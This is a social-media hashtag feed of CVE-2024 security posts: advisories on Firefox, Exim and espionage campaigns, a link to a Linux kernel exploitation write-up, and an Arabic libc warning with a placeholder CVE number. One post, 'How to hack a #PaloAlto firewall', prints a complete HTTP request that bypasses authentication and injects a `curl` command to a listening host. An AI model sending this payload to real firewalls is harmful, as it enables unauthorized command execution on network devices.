⚠️ تحذير لمستخدمي لينكس: ثغرة CVE‑2024‑XXXXX في مكتبة libc تسمح بسرقة مفاتيح SSH والوصول الكامل إلى الخوادم.
🔑 أهم ما يجب فعله الآن
- حدّث جميع التوزيعات إلى الإصدار المصحّح.
- فعّل المصادقة الثنائية وقلل أذونات ملفات المفاتيح.
- راقب سجلات الدخول للأنشطة غير العادية.
Kernel-hack-drill and exploiting CVE-2024-50264 in the Linux kernel
https://a13xp0p0v.github.io/2025/09/02/kernel-hack-drill-and-CVE-2024-50264.html
#HackerNews #KernelHack #Drill #CVE2024 #LinuxKernel #Cybersecurity #Exploit
Some memory corruption bugs are much harder to exploit than others. They can involve race conditions, crash the system, and impose limitations that make a researcher's life difficult. Working with such fragile vulnerabilities demands significant time and effort. CVE-2024-50264 in the Linux kernel is one such hard bug, which received the Pwnie Award 2025 as the Best Privilege Escalation. In this article, I introduce my personal project kernel-hack-drill and show how it helped me to exploit CVE-2024-50264.
How to hack a #PaloAlto firewall:
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
It'll be no surprise that 2024, 2023, 2022, and every other year of humanities' existence has been tough for SSLVPN appliances. Anyhow, there are new vulnerabilities (well, two of them) that are being exploited in the Palo Alto Networks firewall and SSLVPN offering, and as ever, we’re here to
🚨 Did you know cyber espionage groups like Earth Simnavaz can remain undetected for months, exploiting vulnerabilities like CVE-2024-30088 to target critical infrastructure? 🔒
Tip: Always patch known vulnerabilities quickly—delaying can leave systems exposed to advanced threats like these!
How do you prioritize patch management in your organization? 🤔
Dive deeper into this evolving threat on our blog: https://guardiansofcyber.com/cybersecurity-news/earth-simnavaz-cyberattacks-exploiting-cve-2024-30088-to-target-uae-critical-infrastructure-with-stealthy-backdoors/
#Cybersecurity #GuardiansOfCyber #Guardians #APT #Vulnerability #ZeroDay #EarthSimnavaz #CyberThreats #CriticalInfrastructure #CVE2024
🚨 Did you know a simple animation bug could leave your entire browser vulnerable? The latest CVE-2024-9680 exploit targets Firefox and Thunderbird, allowing attackers to execute code without you even knowing! 😨
To stay safe: Update your browser ASAP and always keep auto-updates enabled. These tiny steps make a huge difference in staying protected. 🔒
Have you ever been caught off guard by an update you didn't take seriously? Share your stories below!
Read more about the vulnerability and how to protect yourself: https://guardiansofcyber.com/cybersecurity-news/critical-cve-2024-9680-firefox-and-thunderbird-vulnerabilities-exploited-in-the-wild-patch-now-to-prevent-code-execution-attacks/
#Cybersecurity #GuardiansOfCyber #Guardians #CVE2024 #FirefoxVulnerability #PatchNow #BrowserSecurity #CyberAlert #InfoSec #StaySafeOnline
Critical Exim vulnerability affects 1.5 million servers worldwide
https://stackdiary.com/critical-exim-vulnerability-affects-1-5-million-servers-worldwide/
#Exim #Security #Vulnerability #Cybersecurity #Email #Patch #Update #Critical #Bug #MTA #Server #Protection #CVE2024 #Hacker #Threat #Safety #Admin #IT #Software #Fix #Alert #SecurityBreach #Exploits #CyberAttack #SMTP #PatchNow #ITsecurity #MailServer #Risk #Malware #CyberDefense #CVE #CISA
Global Feed
N-gated Hacker News
Hacker News
Debby ⁂📎🐧
🐦🔥nemo™🐦⬛ 🇺🇦🍉
OOTS
Guardians Of Cyber
Hostvix